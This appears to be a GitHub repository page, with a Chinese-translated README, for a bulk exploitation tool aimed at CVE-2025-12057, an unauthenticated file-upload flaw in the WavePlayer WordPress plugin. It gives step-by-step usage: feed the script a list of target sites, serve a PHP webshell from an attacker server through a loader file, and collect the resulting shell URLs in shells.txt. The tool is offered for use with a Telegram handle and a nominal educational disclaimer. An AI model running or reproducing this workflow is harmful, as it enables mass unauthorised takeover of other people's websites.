DeadExpl0it/CVE-2025-12057-WordPress-Exploit-PoC

GitHub: DeadExpl0it/CVE-2025-12057-WordPress-Exploit-PoC

针对 WordPress WavePlayer 插件任意文件上传漏洞的批量利用工具,可实现未经认证的远程代码执行。

Stars: 0 | Forks: 0

# CVE-2025-12057 – WordPress WavePlayer RCE PoC **CVE-2025-12057** 的概念验证 (PoC),这是一个影响 **WavePlayer WordPress 插件 (< 3.8.0)** 的严重漏洞。 此漏洞允许 **未经身份验证的攻击者** 向服务器上传任意文件,通过上传恶意 PHP 文件 (webshell) 可能导致 **远程代码执行 (RCE)**。 攻击者可以利用易受攻击的上传功能将 PHP payload 放置在服务器上并执行系统命令。 # TELEGRAM: @DEADEXPl0IT # 漏洞详情 CVE: CVE-2025-12057 类型: 未经身份验证的任意文件上传 影响: 远程代码执行 (RCE) 受影响插件: WavePlayer 受影响版本: < 3.8.0 严重程度: 严重 攻击者可以将恶意文件上传到 WordPress 上传目录并远程执行。 # 使用说明 ## 1. 运行 exploit 运行脚本: ``` python3 wave.py ``` ## 2. 提供目标站点列表 脚本将要求提供 **包含目标站点的 .txt 文件路径**。 示例: ``` sites.txt ``` 示例内容: ``` https://example.com https://target2.com https://target3.com ``` 每行必须包含 **一个 WordPress 站点 URL**。 ## 3. 准备 payload 创建一个 PHP payload 文件。 示例: ``` payload.php ``` 示例内容: ``` ``` ## 4. 使 payload 可下载 该 exploit 需要 **直接可下载的 PHP payload URL**。 为此,在与 payload **相同的目录中** 创建另一个 PHP 文件。 示例结构: ``` payload.php loader.php ``` `loader.php` 的内容: ``` ``` 解释: - `$file = "payload.php";` → 要提供的 payload 文件名 - `header("Content-Type: application/x-httpd-php");` → 强制服务器以 PHP 形式返回文件 - `readfile($file);` → 输出 payload 内容 这允许 exploit 脚本正确下载 payload。 ## 5. 使用你的 payload URL 将两个文件上传到你的服务器。 示例 payload URL: ``` http://your-server.com/loader.php ``` 当脚本询问 **payload URL** 时,提供指向 `loader.php` 的链接。 ## 6. 结果 成功利用的目标将保存在: ``` shells.txt ``` 示例输出: ``` https://example.com/wp-content/uploads/peaks/external/{random_numbers}.php https://target2.com/wp-content/uploads/peaks/external/{random_numbers}.php ``` # 关键词 wordpress exploit wordpress poc wordpress rce waveplayer exploit arbitrary file upload remote code execution bug bounty cve-2025-12057 # 免责声明 本项目 **仅供教育目的和授权安全测试使用**。 作者不对使用此代码进行的滥用或非法活动负责。
标签:CISA项目, CVE-2025-12057, OpenVAS, PHP, PoC, Python, RCE, WavePlayer, Webshell, Web安全, WordPress插件漏洞, 任意文件上传, 批量检测, 无后门, 暴力破解, 未授权攻击, 漏洞复现, 编程工具, 网络信息收集, 蓝队分析, 远程代码执行, 逆向工具, 高危漏洞